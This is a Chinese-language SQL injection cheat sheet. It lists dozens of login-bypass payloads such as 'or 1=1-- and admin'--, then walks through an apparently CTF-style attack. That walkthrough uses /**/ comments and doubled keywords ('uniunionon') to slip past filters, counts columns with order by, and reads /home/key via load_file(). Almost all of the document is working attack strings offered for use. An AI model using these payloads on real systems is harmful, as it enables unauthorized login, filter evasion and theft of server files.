SQL注入篇
用户登录注入
username:admin
password:"or "a"="a
输入账户密码:
登录结果:
常用密码:
"or "a"="a
'.).or.('.a.'='.a
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
'or.'a.'='a
"or"="a'='a
'or''='
'or'='or'
admin'or 1=1#
admin'/*
aaaa*/'
'or 1=1/*
"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or 1=1/*
'or"="a'='a
'or' '1'='1'
'or''='
' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1
id=1 注入
//判断是否可以注入 服务器会过滤空格,使用/**/替换空格
?id=1')/**/and/**/1=1/**/%23
//判断是否可以注入
?id=1')/**/and/**/1=2/**/%23
//判断查询位数
?id=1')/**/order/**/by/**/4/**/%23
//判断查询位数
?id=1')/**/order/**/by/**/5/**/%23
order by 4 显示正常
order by 5 显示不正常
即有四列
//union使用双写防过滤,使用1,2,3,4判断显示位置
?id=-1')/**/uniunionon/**/select/**/1,2,3,4/**/%23
由题目得知key文件在/home/key
读取key
//使用load_file()函数读取key
?id=-1')/**/uniunionon/**/select/**/1,2,3,load_file("/home/key")/**/%23
浙公网安备 33010602011771号